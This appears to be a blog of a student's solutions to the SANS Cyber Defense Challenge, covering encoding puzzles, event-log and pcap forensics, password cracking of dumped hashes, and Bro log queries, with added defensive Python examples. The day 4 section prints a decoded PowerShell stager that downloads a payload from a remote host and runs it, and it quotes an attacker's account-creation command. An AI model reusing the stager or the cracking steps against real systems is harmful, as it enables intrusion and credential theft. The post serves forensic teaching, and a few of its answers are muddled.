Friday, October 28, 2016

SANS Cyber Defense Challenge: What did the other Powershell Command do?

I was wondering what the other PowerShell command did in day four.  It looks like a file.  It's probably just random bits, but I was wondering if it was like that shift cipher.  Sometimes they hide Easter eggs in the challenges.  So far I haven't found anything.  I'll have to look at that PowerShell command in the evtx log again.  I know that it was base64 encoded, so I decoded it.  I wonder if the command did anything else.

SANS Cyber Defense Challenge-Day 5 Solution

These weren't so bad.  The only one that I missed was the last one, and that was only because I was over-thinking it.  I was shifting it around in the browser and text editor, but I didn't realize that that was what I was supposed to do.  I thought that maybe I had to decode it.  This was the steganography one: a meaning hidden in just the way that the numbers were aligned.  A shift cipher.  Disappointed in myself.  I tried.  I was the only SEC 401 student that I know of who was in the top 10, so that's something.  I won a Raspberry Pi CanaKit.  The top ten got prizes.

What's the secret word for SANS San Diego 2016 day 5?
bluescreenoflife

The first challenge - (5 pts)
Simple base64 encoding.  Just decode it.  You see enough of them, and you know what to do.

The first challenge is: VGhlIGFuc3dlciB0byB0aGUgZmlyc3QgY2hhbGxlbmdlIGlzOiBtYXRocw==
maths

What is the answer to the first challenge? The answer is a lower case string.

The second challenge - (20 pts)
The 2nd challenge is: V2toIGRxdnpodSB3ciB3a2x2IGZrZG9vaHFqaCBsdjogdnhwcGR3bHJxIA==

So base64 decode again.  Then it is a ROT encoding; you have to figure out how many rotations.  There are online tools for this that crack them quickly.  Again, once you have seen enough of them, your brain starts to recognize them.  The rotation was 23 for this one: summation

What is the answer to the second challenge? The answer is a lower case string.


61584235636e4a6c596e427a595849674f6e4e704947566e626d56736247
466f5979426b636d6c6f6443426c6148516762335167636d563363323568
4947566f56416f3d0a

What is the answer to the third challenge? The answer is a lower case string.

This one was fun.  First you hex decode it.  Then you get a base64 string, which you decode.  The answer is backwards: ipyrrebpsar :si egnellahc driht eht ot rewsna ehT.  It's raspberrypi.  :)

Spot the Pattern - (35 pts)
Download and inspect this file: https://sanschallenge.org/files/phrase.txt

What is the day 5 phrase that pays? The answer is a lower case string.

Only question that I didn't get.  We were told how it was solved, though.  You look at the file in your browser or text editor and resize the window until the lines line up a certain way.  In the white space, you see a website.  Alternately, I saw Mr. Conrad do something on the command line.  I didn't catch all of it, but it showed the website in # signs.  The phrase was blueteamforever.

SANS Cyber Defense Challenge-Day 4 Solution

These weren't too bad, as long as you downloaded the logs on a Mac or Linux (which downloads the actual file) and copied them to a Windows 7+ VM: then all you had to do was double click the file in the Windows VM and the program that you needed loaded automatically.  The only two where you couldn't find the answer directly in the event logs were the PowerShell questions, where you had to study security2.evtx.  You had to base64 decode the base64 encoded string in the PowerShell command, and it gave you the User-Agent.  You also had to use that same method to find the IP address.  The others were straightforward if you were looking for them.

What's the secret word for SANS San Diego 2016 day 4?
watchersonthefirewall

Group add - (5 pts)
The following series of questions are based on these two Windows event logs:

https://sanschallenge.org/files/sanschallenge-security.evtx
https://sanschallenge.org/files/sanschallenge-system.evtx

They are the security and system event logs from a compromised Windows 7 system. Analyze these files on a Windows 7+ system.

Part of your challenge requires you to determine which event log to use to answer each question.

What is the Security ID of the user added to a security-enabled local group?

Answer with the complete security ID, for example: 

S-1-5-21-1234567890-1234567890-1234567890-1234
security.evtx
S-1-5-21-3463664321-2923530833-3546627382-1007

Name that password - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

What is rachel's password?
security.evtx
There is a command in one of the logs:
net user rachel replicant2 /add
This is a command to add a user and a password to the SAM database.
replicant2

Suspicious service - (5 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious service was created, with a 16-character service name. What is the name of the service? The answer is a 16 character string, with mixed case.

Suspicious pipe - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious pipe was created: what is the name of the pipe? Answer with the name itself, and omit any directories. For example, if the pipe is: \\.\pipe\name

...the answer would be "name" without the quotes.
This was found in another command:
cmd.exe /c echo uxjxtu > \\.\pipe\uxjxtu
uxjxtu

Name that VBS - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious VBScript is run from a temporary folder. What is the name of the .vbs script?

Include the .vbs script name only, preserve the case, and omit the directory. For example, if the path was:

C:\Windows\TEMP\ExAmPLe.vbs

...the answer would be 'ExAmPLe.vbs' without the quotes.

Not rocket science.  The only one in the security.evtx that I could find that was run out of a temp directory.
WvkkaCoF.vbs

Name that EXE - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious executable is run from a temporary folder. What is the name of the executable? Include the EXE name only, preserve the case, and omit the directory. For example, if the path was:

C:\Windows\Temp\asdfgh\ExAmPLe.exe

...the answer would be 'ExAmPLe.exe' without the quotes.

This was the only one in the security.evtx that I could find that was run out of a temp directory.  ZaCVvSRkGaIJZ.exe

Source Workstation - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

What is the name of the Source Workstation that created the event: "The computer attempted to validate the credentials for an account"? The answer is a mixed case string.

So yet again, this one was in the security.evtx.  ZgTtCUS6fFdExXeu

Compromised user - (5 pts)
The next series of questions are based on the following evtx file:

https://sanschallenge.org/files/sanschallenge2-security.evtx

Notice the "2" in the name, this is a different file than the one analyzed in the previous series of questions.

A PowerShell-based post exploitation framework is launched via "launcher.bat". What is the account name of the user that ran launcher.bat? The account name is a string, mixed case.

IEUser


If you base64 decode this, it gives the answer to the next two questions.  It was found in the PowerShell command in sanschallenge2-security.evtx.
JAB3AEMAPQBOAGUAVwAtAE8AYgBKAGUAYwBUACAAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcAZQBiAEMATABJAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUABSAG8AWABZACAAPQAgAFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBRAFUAZQBTAFQAXQA6ADoARABFAEYAQQB1AEwAVABXAGUAYgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBvAHgAeQAuAEMAUgBFAGQAZQBuAHQAaQBBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAGkAYQBsAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AFcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEATABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAFIAWwBdAF0AJABiAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAFcAQwAuAEQATwBXAE4ATABPAGEAZABTAFQAUgBJAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABrAFsAJABpACsAKwAlACQASwAuAEwARQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAGIALQBqAE8ASQBuACcAJwApAA==

$wC=NeW-ObJecT System.NeT.WebCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEAdErs.ADd('User-Agent',$u);$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;$K=')0dhCy1J9s3qY@%L!7pu]T|vV}tn[AQR';$i=0;[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG("http://192.168.198.149:8080/index.asp")))|%{$_-BXoR$k[$i++%$K.LEnGTH]};IEX ($b-jOIn'')
User-Agent - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx

The PowerShell-based post exploitation framework manually sets a user agent. What is the user agent?

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

IP address - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx

What IP address is index.asp downloaded from? Respond with the IPv4 address in dotted quad format, for example "192.168.1.2" without the quotes.
192.168.198.149
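An added example (my code, not from the post or the challenge) of the decode step above done properly and turned into indicator extraction. The blob in the log is PowerShell's -EncodedCommand form, which is base64 over UTF-16LE text, so a plain base64 decode shows a NUL between every character; decoding as UTF-16LE gives the command cleanly. The sample input is the decoded stager quoted above, cut after the download URL, and the script re-encodes it to show what the logged field looks like before decoding it back and pulling out the user agent, URL and IP. The triage check and the regexes are my own assumptions about what such a command looks like.

```python
import base64
import re

# Sample input: the page's decoded stager command, truncated after the download URL
# (that is all the extraction below needs).
SAMPLE_SCRIPT = (
    "$wC=NeW-ObJecT System.NeT.WebCLIENt;"
    "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$wc.HEAdErs.ADd('User-Agent',$u);"
    "$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;"
    "$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;"
    "[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG(\"http://192.168.198.149:8080/index.asp\")))"
)


def encode_powershell(script):
    """The -EncodedCommand form: the script as UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob):
    """Reverse it: base64, then UTF-16LE. Stopping after base64 leaves a NUL after
    every character, which is the 'spaced out' text you see in the raw log."""
    return base64.b64decode(blob).decode("utf-16-le")


def looks_encoded_command(blob):
    """Cheap triage for an ASCII-only script: valid base64 whose decoded bytes
    have a NUL in every odd position (the UTF-16LE high byte)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def extract_indicators(script):
    """Pull the user agent plus download URLs and IPs out of a decoded script."""
    ua = None
    m = re.search(r"\.add\(\s*'User-Agent'\s*,\s*(\$\w+|'[^']*')\s*\)",
                  script, re.IGNORECASE)
    if m:
        ref = m.group(1)
        if ref.startswith("$"):
            # Resolve the variable; PowerShell variable names are case-insensitive.
            assign = re.search(r"\$" + re.escape(ref[1:]) + r"\s*=\s*'([^']*)'",
                               script, re.IGNORECASE)
            ua = assign.group(1) if assign else None
        else:
            ua = ref.strip("'")
    urls = re.findall(r"https?://[^\s\"'()]+", script)
    ips = sorted({ip for u in urls
                  for ip in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", u)})
    return {"user_agent": ua, "urls": urls, "ips": ips}


if __name__ == "__main__":
    blob = encode_powershell(SAMPLE_SCRIPT)
    print(blob[:40] + "...")
    print(extract_indicators(decode_powershell(blob)))
```

Because the sample starts with the same characters as the command in the log, the re-encoded blob begins with the same JAB3AEMAPQBO... prefix seen above; that prefix ($ followed by a NUL) is a handy thing to look for when hunting encoded commands in command-line logging.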


Thursday, October 27, 2016

SANS Cyber Defense Challenge-Day 3 Solution

I used John The Ripper and Security Onion's tool bro to answer these questions.

Crack is Whack - (10 pts)
You are a newly-hired security engineer at KVWN (channel 4), San Diego. You are tasked with securing the enterprise, beginning with auditing existing password security.

Inspect the following:

---

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
btamland:1006:aad3b435b51404eeaad3b435b51404ee:1745892e12bc8aaab1b81a927600d67a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ckind:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
eharken:1007:aad3b435b51404eeaad3b435b51404ee:0e8b0d78cada2f22e733d1b6e6021da2:::
vcorningstone:1001:aad3b435b51404eeaad3b435b51404ee:af1d0a042ecee784095d368b7f831168:::
meterpreter > 

---

What is vcorningstone's password?

You copy/paste vcorningstone's line into a text editor and save it as vcorningstone on a Linux machine with John the Ripper.  You specify the hash format.  Then you simply let john do its job.
john ./vcorningstone --format=NT
sekrit

Crack me Up - (10 pts)
Inspect the following:

---

mysql> select user,password from mysql.user;
+------------------+-------------------------------------------+
| user | password |
+------------------+-------------------------------------------+
| root | *2CAB1C0BB01BDEE1CFB157535AE9E788C3A966D3 |
| debian-sys-maint | *992B89066D80745163BF9828B1CBE9F7F2ECD1AE |
| drupal7 | *2CAB1C0BB01BDEE1CFB157535AE9E788C3A966D3 |
| ronburgundy | *599075AEF85B14C3CFAFCBCA3CEE1715AABD56DE |
+------------------+-------------------------------------------+
4 rows in set (0.00 sec)

---

What is ronburgundy's password?

This one is a little weird because you have to know how John the Ripper takes input.  You have to remove everything except for the MySQL 4.1+ SHA1 hash (or hashes) that you want, so that John the Ripper can detect it as MySQL.  This one is anchorman.

john ./passwordlist3.txt --wordlist=wordlist.txt


Jimmy Crack Corn - (15 pts)
Inspect the following:

---

ckind:$6$/lDBMLNZ$pdajNb.NySSswRSmDE2FXw2WCYFnjjAcNI7sCbZ/8Tyx00lPpGUp4egCsHXqDX11Yunn5KYTzYmpnFQFNj5Wd0:17091:0:99999:7:::
btamland:$6$WsSuXR2A$GQ1kj1F4hV7FACaUEjLxNorYrTily1LOqOl6MgaJzVIMRLVkKrdMLyAjzRSk/LGEyGbIt8DN0nhuN56UOLRfq/:17091:0:99999:7:::
vcorningstone:$6$Q3NQpOeX$4GJa7DyFOsaq4WxrM/2urOHHm4fgMqeVrr1ieVM2p6SVGKmZmMxVbRMMWEq2.ut4dx71XRArYNagsky4AfK43/:17091:0:99999:7:::
eharken:$6$Q0bL6Gy3$/RLMMwsj5vlOxyI2OnVd1IOsP6nFKROonJbUw4TOdvw5OLC94C1vWMqLQ2d0wDUXYsP603Pi4V7vOTp658tEg1:17091:0:99999:7:::

---

A colleague has run CeWL (Custom Word List generator) against the KVWN website, providing this custom wordlist: https://sanschallenge.org/files/sd2016-wordlist.txt

What is btamland's password?
This one is a SHA-512 crypt hash.  You're given a word list, so you have to use it to crack this one.  You can tell because the $6$ prefix tells you what kind of hash it is.
john ./passwordlist2.txt --wordlist=wordlist.lst --rules
The --rules add mangling rules.  Read the John The Ripper documentation for more information.
heinie!

Bro - (10 pts)
The next series of questions are based on Bro logs. 

Download https://sanschallenge.org/files/bro.zip and uncompress it.

The 'bro-cut' command will be quite handy.

Bro may be installed on a Debian-style Linux system (including Kali) by typing:

$ sudo apt-get install bro-aux

These questions may be answered without Bro, by simply analyzing with Unix/Linux text-based tools such as grep, sed, etc. Bro will make the challenges easier, for example:

$ cat dns.log | bro-cut query 

More information on Bro is available at: https://www.bro.org/

----

Inspect dns.log


What is the most common DNS name successfully resolved via UDP port 53? Respond with the full name, for example: 'www.google.com' without the quotes.

With DNS, it is usually UDP 53, so you didn't have to add the protocol to this query.  If you look at the logs, they have headers at the top that help bro-cut find the fields you want.  So, you cat the log (which prints it to the screen), ask bro-cut to pull out the fields that you want, sort them, grab the unique queries and count them, then sort by the number of occurrences in reverse (-r), so the most frequent come first.  Then you grab the first 10 entries in the file.  Now, I didn't take out the invalid entries.  I just looked at the first 10 entries for the most common DNS queries with an rcode of 0, which means that it successfully resolved.  My query was something like this:

cat dns.log | bro-cut query rcode | sort | uniq -c | sort -r -n > file
head -n 10 file

proxim.ircgalaxy.pl

Longest DNS Query - (5 pts)
How long is the longest DNS query in dns.log? 

For example, this DNS query is 17 bytes long:

sanschallenge.org
cat dns.log | bro-cut query | awk '{ print length; }' > file
sort -n file > file2

Then I just picked the one with the longest query.


Longest User Agent - (10 pts)
How long is the longest user agent in http.log? 

You don't have to know the name.  You just need how long it is.  So, I did something like this:

cat http.log | bro-cut user_agent | sort -u | awk '{ print length; }' | sort -n


Shortest user_agent - (10 pts)

What is the shortest non-blank user_agent in http.log? Ignore blank user agents (such as '-').

Hint: it is comprised of capital letters only. For example: 'FOO' without the quotes.

There is probably a lot better way to do this.  I did this:
cat http.log | bro-cut user_agent | grep -v '^-$' | sort -u | awk '{ print length, $0 }' | sort -r -n > file
tail -n 20 file

IE

Longest duration - (15 pts)

What socket pair has the longest duration in conn.log?

Answer in the following format: srcip[colon]srcport[space]dstip[colon]dstport

For example, if the source IP 10.10.10.10 from port 12345 sent traffic to 8.8.8.8 on port 80, your answer (without the quotes) would be: '10.10.10.10:1234 8.8.8.8:80'

cat conn.log | bro-cut duration id.orig_h id.orig_p id.resp_h id.resp_p | sort -n > file2
cat file2 | tail -n 10
The longest one was at the bottom.  168.131.48.242:1076 143.215.15.145:80

Inspect conn.log

How many TCP sessions had a duration longer than 24 hours?

The time was expressed in seconds and milliseconds, so I divided each time by 60, then divided each time by 60 again to get how many days that the connections were active.  If it was greater than 24, I printed it.

9
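The Bro questions above (most common successfully resolved name over UDP/53, longest query, longest and shortest non-blank user agent, longest-lived socket pair, and TCP sessions longer than 24 hours) worked in one place, as an added example that is my own code rather than anything from the post or from Bro. It does what bro-cut does without needing Bro installed: column names come from the #fields header line of each log, so the same parser handles dns.log, http.log and conn.log. The three logs are constructed samples built in memory with a reduced set of columns, not the challenge files; conn.log's duration is in seconds, so the 24-hour threshold is 86,400, and records whose duration was never set ('-') are skipped rather than crashing the float conversion.

```python
from collections import Counter


def make_bro_log(path, fields, rows):
    """Build a minimal Bro ASCII log in memory (constructed sample, not the challenge files)."""
    lines = ["#separator \\x09", "#path " + path, "#fields\t" + "\t".join(fields)]
    lines += ["\t".join(str(v) for v in row) for row in rows]
    return "\n".join(lines + ["#close"]) + "\n"


def parse_bro_log(text):
    """bro-cut without Bro: column names come from the #fields header; one dict per record."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#fields\t"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue                      # other header lines, #close, blank lines
        else:
            records.append(dict(zip(fields, line.split("\t"))))
    return records


# Constructed sample logs. Names use the reserved example/TEST-NET ranges.
DNS = parse_bro_log(make_bro_log("dns",
    ["id.orig_h", "id.resp_p", "proto", "query", "rcode"], [
    ("10.0.0.5", 53, "udp", "proxim.example.test", 0),
    ("10.0.0.5", 53, "udp", "proxim.example.test", 0),
    ("10.0.0.5", 53, "udp", "www.example.test", 0),
    ("10.0.0.5", 53, "udp", "nxdomain.example.test", 3),   # rcode 3 = NXDOMAIN, not resolved
    ("10.0.0.5", 53, "udp", "nxdomain.example.test", 3),
    ("10.0.0.5", 53, "udp", "nxdomain.example.test", 3),
    ("10.0.0.5", 53, "tcp", "proxim.example.test", 0),     # TCP, excluded by the question
    ("10.0.0.5", 53, "udp", "a-very-long-subdomain-label.example.test", 0),
]))
HTTP = parse_bro_log(make_bro_log("http", ["user_agent"], [
    ("Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",),
    ("-",),                                                # Bro's unset marker: blank UA
    ("IE",),
    ("curl/7.47.0",),
]))
CONN = parse_bro_log(make_bro_log("conn",
    ["id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "duration"], [
    ("10.0.0.5", 1076, "203.0.113.7", 80, "tcp", 100000.5),
    ("10.0.0.5", 1077, "203.0.113.7", 80, "tcp", 90000.0),
    ("10.0.0.6", 2000, "203.0.113.8", 443, "tcp", 3600.0),
    ("10.0.0.6", 2001, "203.0.113.9", 53, "udp", 99999.0),  # long-lived, but UDP
    ("10.0.0.7", 3000, "203.0.113.10", 80, "tcp", "-"),     # duration never set
]))


def most_common_query(dns, successful_only=True):
    """Most frequent name asked over UDP/53; successful_only keeps rcode 0 (NOERROR) only."""
    counts = Counter(r["query"] for r in dns
                     if r["proto"] == "udp" and r["id.resp_p"] == "53"
                     and (not successful_only or r["rcode"] == "0"))
    return counts.most_common(1)[0][0]


def longest_query_length(dns):
    """Length in characters of the longest query (unset queries ignored)."""
    return max(len(r["query"]) for r in dns if r["query"] != "-")


def user_agent_extremes(http):
    """(longest, shortest non-blank) user agent strings."""
    agents = [r["user_agent"] for r in http if r["user_agent"] != "-"]
    return max(agents, key=len), min(agents, key=len)


def longest_duration_pair(conn):
    """Socket pair of the longest-lived connection, in the challenge's answer format."""
    live = [r for r in conn if r["duration"] != "-"]
    r = max(live, key=lambda x: float(x["duration"]))
    return f"{r['id.orig_h']}:{r['id.orig_p']} {r['id.resp_h']}:{r['id.resp_p']}"


def count_tcp_longer_than(conn, seconds=24 * 60 * 60):
    """TCP sessions whose duration (seconds) exceeds the threshold; '-' means unset."""
    return sum(1 for r in conn if r["proto"] == "tcp"
               and r["duration"] != "-" and float(r["duration"]) > seconds)


if __name__ == "__main__":
    print(most_common_query(DNS), most_common_query(DNS, successful_only=False))
    print(longest_query_length(DNS), user_agent_extremes(HTTP))
    print(longest_duration_pair(CONN), count_tcp_longer_than(CONN))
```

Running it against the real files is a matter of replacing the constructed logs with open("dns.log").read() and so on. The successful_only switch shows why the rcode filter matters: in the sample the most-queried name overall is an NXDOMAIN that never resolved.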


SANS Cyber Defense Challenge-Day 2 Solution

What’s the secret word for SANS San Diego 2016 day 2?


cryptololcat

If you use Wireshark in most of these, you will find the answer that you need.
mystery.pcap
What type of request does 192.168.11.62 send to 192.168.11.1 in the first DNS Request?
The answer was in the question.

DNS Request

What is the DNS Transaction ID in hexadecimal in the DNS query?
You put a filter in Wireshark called dns.id == 0x2870.
0x2870

From your knowledge of DNS, how many responses should there be to a DNS query?
A general knowledge question, and a hint for the later question "What is this type of attack called?".
1

What is the number of the frame where the transaction ID in the response matches that first request?

If you look at pcaps in Wireshark, it tries to tell you which response frame matches which query; they aren't always right next to each other in the pcap because of other traffic.  Look at the first packet's transaction ID.  Then filter according to it.
Wireshark Filter:  dns.id == 0x2870
102

What is the IP address sent in the spoofed DNS A record responses?
This was all over the pcap.  There was only one IP address that was not 10.10.10.10: 108.61.4.52.  (You use the filter dns.a != 0a:0a:0a:0a; 0a is 10 in hex, and != means not equal.  So you find the valid response that way.)  10.10.10.10 was not the true response.  The computer accepts whichever answer it gets first.

10.10.10.10

What is this type of attack called?

DNS Cache Poisoning

Which frame triggered the ICMP Type 3 Code 3 packet?
You look at packet 104 (frame.number == 104), then you look at its transaction ID, which is 0x0065, then you filter by the transaction ID.
dns.id == 0x0065
The transaction ID in 103 matched the ICMP Type 3 Code 3 packet in 104.  It will not always be the packet near it.
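The two ideas behind the mystery.pcap questions, that a query should get exactly one response and that the resolver keeps the first answer it sees, as an added example in code (mine, not from the post). Instead of a pcap it works over a constructed list of frames modelled on the write-up: frame 1 is the 0x2870 query, it gets three responses where it should get one, and the 0x0065 query gets no DNS response at all (the case answered only by the ICMP port unreachable). Frame numbers 1, 102, 103 and the two transaction IDs are the page's; the other frames and the 198.51.100.20 answer are made up.

```python
from collections import Counter, defaultdict

# Constructed frames: (frame number, dns.id, is_response, src, dst, A record or None).
FRAMES = [
    (1,   0x2870, False, "192.168.11.62", "192.168.11.1",  None),
    (50,  0x2870, True,  "192.168.11.1",  "192.168.11.62", "10.10.10.10"),
    (51,  0x2870, True,  "192.168.11.1",  "192.168.11.62", "10.10.10.10"),
    (102, 0x2870, True,  "192.168.11.1",  "192.168.11.62", "108.61.4.52"),
    (103, 0x0065, False, "192.168.11.62", "192.168.11.1",  None),
    (200, 0x1234, False, "192.168.11.62", "192.168.11.1",  None),
    (201, 0x1234, True,  "192.168.11.1",  "192.168.11.62", "198.51.100.20"),
]


def responses_by_txid(frames):
    """Group response frames by transaction ID in capture order: the
    'dns.id == 0x2870' filter from above, applied to every ID at once."""
    groups = defaultdict(list)
    for frame in sorted(frames, key=lambda f: f[0]):
        if frame[2]:
            groups[frame[1]].append(frame)
    return groups


def duplicate_responses(frames):
    """One query should get one response; any ID with more deserves a look."""
    return {txid: [f[0] for f in group]
            for txid, group in responses_by_txid(frames).items() if len(group) > 1}


def accepted_answer(frames, txid):
    """The resolver keeps whichever answer arrives first, so that is what got cached."""
    group = responses_by_txid(frames).get(txid, [])
    return group[0][5] if group else None


def answer_distribution(frames, txid):
    """How many responses carried each A record; a flood of one value is the tell."""
    return Counter(f[5] for f in responses_by_txid(frames).get(txid, []))


def unanswered_queries(frames):
    """Queries that never got a DNS response (e.g. only an ICMP port unreachable came back)."""
    answered = set(responses_by_txid(frames))
    return sorted(f[1] for f in frames if not f[2] and f[1] not in answered)


if __name__ == "__main__":
    for txid, frame_numbers in duplicate_responses(FRAMES).items():
        print(f"dns.id 0x{txid:04x}: {len(frame_numbers)} responses in frames {frame_numbers};"
              f" cached {accepted_answer(FRAMES, txid)}; answers {dict(answer_distribution(FRAMES, txid))}")
    print("no DNS response for:", [f"0x{t:04x}" for t in unanswered_queries(FRAMES)])
```

Feeding it real traffic means filling FRAMES from a dissector (for example tshark fields for frame.number, dns.id, dns.flags.response, ip.src, ip.dst and dns.a); the grouping and the first-answer rule do not change.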

portscan.pcap

What TCP port is *not* open on 192.168.198.190?

Port 137, the only one with no traffic.  Sometimes resets signal closed/filtered ports, but every other answer had traffic other than resets, so the only one that was *closed* was port 137.  In Wireshark, if you filter by port like tcp.port == 137, you don't see any traffic.  If you do the same with udp.port == 137, you still see no traffic.  You can do that with every answer by just changing the port number and seeing that the others had traffic.

What OS is running on 192.168.188.190?

I found this in the SMB traffic for the Session Setup AndX Response.  Wireshark > Statistics > Protocol Hierarchy > SMB Session Service > right-click and choose "Apply As Filter".  Click on a Session Setup AndX packet, then right-click and choose Follow TCP Stream.
Windows 7 Enterprise 7601

What is the day 2 phrase that pays?

In Wireshark, go to File > Export Objects > HTTP, and you will see that there is a PDF called "day2.pcap".  The phrase that pays was in the PDF file.

bustapcap


What version of squid was used for http proxy?

The filter that I used for this one in Wireshark is:  icmp contains squid.  Or you could use icmp contains 73:71:75:69:64

3.5.19

What is the ICMP tunnel phrase?
So the filter I used for this one is:  icmp contains 74:75:6e:6e:65:6c
That is the hex for tunnel.

In the pcap traffic, you will notice that the sanschallenge.org website has a special domain, test.sanschallenge.org.  You will also see a file called tunnel.html.  So, if you navigate to test.sanschallenge.org/tunnel.html, a page will load that says, “tunnelsallthewaydown”.

SANS Cyber Defense Challenge-Day 1 Solution

Secret word 1 - (5 pts)
What's the secret word for SANS San Diego 2016 day 1?

This word was given to us.
advancedpersistenttaco

Use Google to answer most of these.  It didn't say in the challenge that you couldn't use outside resources.

How many ports
How many ports are available on a Linux or Windows operating system, counting both TCP and UDP?

I learned this in the Networking portion of SANS SEC 401.  Some may be saying, "There are 65,536 ports.  Why is the answer 131,072?"  Well, because they said both TCP and UDP.  Add 65,536 and 65,536, and you get 131,072.

0
131070
65536
About 7
1337
131072
65535

Name that OS
This is a legitimate user agent string sent from a Microsoft Windows client operating system:

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

What OS is the client running?

Windows 8.1
Microsoft Bob
Atari TOS
Windows Vista
Windows 8
Windows XP
Windows 10
Windows 7

sans.org
When was the domain sans.org registered?

1995-08-04
1967-11-13
1337-12-25
1994-09-12
1997-03-12
1776-07-04
1990-01-01
2016-10-27

Time to Live
What is the name of the IPv6 field that is equivalent to IPv4's Time to Live?

I learned this one in SANS SEC 401 this week during the Networking portion.

Hop Limit
Version
Next Header
Flow Label
Traffic Class
Time to Live

IPv6
A new network engineer announces that he's going to conduct an active scan and ping every address on a standard IPv6 /64 subnet. You mention the vast size of the subnet, and the engineer confidently states he can ping a million addresses/day.

How long will the ping scan take, assuming 1 million hosts are scanned per day?  

So, there are 18446744073709551616 (2^64) hosts per IPv6 /64 network.  If you divide that by 1,000,000, it gives you the number of days it would take to scan the hosts at that rate.  Then you divide by 365 to get the years.
42
5+ years
50,539,024+ years
50+ years
50,539+ years
Infinity!
1337 minutes
A month or so
50,539,024,859+ years  

What is the IPv6 address of sanschallenge.org?

If you watch the traffic with tcpdump or Wireshark running and ping sanschallenge.org from a Mac or Linux, you should get an IPv6 address back.  Ping uses ICMP traffic.

ping sanschallenge.org

104.131.191.1
2604:a880:0:1010::5db:4001
2604:a880:800:10::1a64:2001
2001:470:1f06:bef::2
dead:beef:c0de:fa11:feed:babe:cafe:f00d
2400:cb00:2049:1::adf5:3a33
42

Version detection - (10 pts)
What version of Apache is running on https://sanschallenge.org? Answer with a number.

For example, if the version is "Apache/1.2.3", you would answer '1.2.3' without the quotes.

From a Mac or Linux terminal, you can use curl -I to make a HEAD request, which returns just the response headers from a website, assuming it's allowed.


2.4.7 (Apache/2.4.7)

Domo Arigato - (10 pts)
What directory is disallowed from spidering, per the robots.txt file on https://sanschallenge.org? Answer with the directory name only, including the leading and trailing slash. For example, if the entry is: 

Disallow: /folder/

The answer would be '/folder/' without the quotes.

You just navigate to https://sanschallenge.org/robots.txt, and it shows the /wickedsecret/ directory.

/wickedsecret/
Key size - (10 pts)
What is the size of the RSA public key used in the x509 certificate for https://sanschallenge.org?

Another you-know-it-or-you-don't question.  The RSA public key is 2048 bits in length.

3072 bits
8 bits
1 bit
2 bits
16 bits
4 bits
1024 bits
64 bits
4096 bits
2048 bits
128 bits
32 bits
256 bits
512 bits